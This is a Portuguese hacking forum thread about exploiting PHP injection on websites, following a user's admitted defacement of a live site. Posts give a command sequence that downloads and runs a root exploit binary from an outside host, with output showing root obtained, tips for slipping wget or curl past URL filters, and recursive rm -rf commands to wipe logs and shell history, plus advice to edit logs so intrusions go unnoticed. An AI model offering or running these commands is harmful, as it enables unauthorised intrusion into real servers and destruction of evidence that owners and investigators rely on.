PHP Injection - O Fim das Dúvidas

[Bruno Candido]

daew dsoul... tu que manja disso.. podes me responder algo bem simples?

tipo... eu jí fiz um deface (A) mas tipo.. nao rootei a shell nao.. só pus o meu index e renomei o index original pra index2. e deixei os arquivos.. pois bem.. caso eu quisesse rootar.. como faria??

sysname: Linux
nodename: ux01.9netweb.it
release: 2.4.20-28.7smp
version: #1 SMP Thu Dec 18 11:18:31 EST 2003
machine: i686
Script Current User: ux011148
PHP Version: 4.1.1
User Info: uid(1401) euid(1401) gid(1401)
Current Path: /ux01/1/148/public_html/PHP-Nuke/modules/My_eGallery/public
Server IP: 66.71.135.148
Web Server: Apache/1.3.28 (Unix) mod_perl/1.29

tu precisa jí ter rodado backdoor, ter acesso por telnet..
tenta usar esse exploit:
wget http://www.dsoulzin.net/tmp/brk2
chmod 777 brk2
./brk2
e se der tudo certo, nenhum erro digita id que vai estar root :P
mesmo kernel:

Código:

[nobody@test2 tmp]: uname -a
Linux test2 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
[nobody@test2 tmp]: wget http://www.dsoulzin.net/tmp/brk2
--15:00:24--  http://www.dsoulzin.net/tmp/brk2
           => `brk2'
Resolving www.dsoulzin.net... done.
Connecting to www.dsoulzin.net[68.142.234.59]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 456,205 [application/octet-stream]

100%[====================================>] 456,205      10.74M/s    ETA 00:00

15:00:27 (10.74 MB/s) - `brk2' saved [456205/456205]

[nobody@test2 tmp]: chmod 777 brk2
[nobody@test2 tmp]: ./brk2
sh-2.05b# id
uid=0(root) gid=0(root)

p.s.: que bom que gostaram do tuto

[souzadc]

Cara,

Muito boa sua explicação. Parabéns e continue contribuindo.

Sem mais!!!
:arrow:

[Dragonz]

tipo
como eu faco pra pegar uma shell?

vlw

[Bruno Candido]

roda a backdoor nela e entra por telnet ^^
expliquei ali sobre o r0nin

[mkswd]

Muitas pessoas jí pergutaram sobre um bóm tópico sobre php injection. Parabéns dsoul. COntinue assim.

Abraços

[jokerbr]

o problema eh q nem todos os sites q sao vulneraveis a php injection aceita o wget... vamo esperar o dsoul falar + ai .. abraços.

[Bruno Candido]

existem sites que se existe wget, curl ou outros comandos de linux na url ele te joga para a pígina de Forbidden, existem alguns comandos que as vezes não são bloqueados, por isso sempre tentem wget, curl -O, lynx, get, fetch..
ou usem a cabeça para não colocar esses comandos no cmd, e sim dentro de algum código de fonte :lol:
daqui a pouco vou explicar como rodar uma conexão reversa para seu ip, se a maquina tiver firewall e não deixa você se conectar a ela, manda ela se conectar a você :wink:

[jokerbr]

dsoul e quanto a nossa segurança, caso eu esteja falando besteira me corrija. mas é bom fazer sempre isso usando um proxy?
qual o metodo q vc recomenda para nos protegermos?

[Bruno Candido]

bem, eu nunca me protegi com proxyes.. mas é sempre mais seguro.. se tiver proxy rapida o que custa colocar?
quando se tem root é sempre bom deletar os logs:

find / -name .bash_history -exec rm -rf {} \;
find / -name .bash_logout -exec rm -rf {} \;
find / -name log* -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;


creio que isso jí dí ^^

sem mais :arrow:

[Simplicity]

bem, eu nunca me protegi com proxyes.. mas é sempre mais seguro.. se tiver proxy rapida o que custa colocar?
quando se tem root é sempre bom deletar os logs:

find / -name .bash_history -exec rm -rf {} \;
find / -name .bash_logout -exec rm -rf {} \;
find / -name log* -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;


creio que isso jí dí ^^

sem mais :arrow:

Melhor ainda, NUNCA DELETE UM LOG SEMPRE EDITE, assim ñ hí muita suspeita de um administrador descobrir uma invasão, ou simplesmente retarda a descoberta vlw. :wink: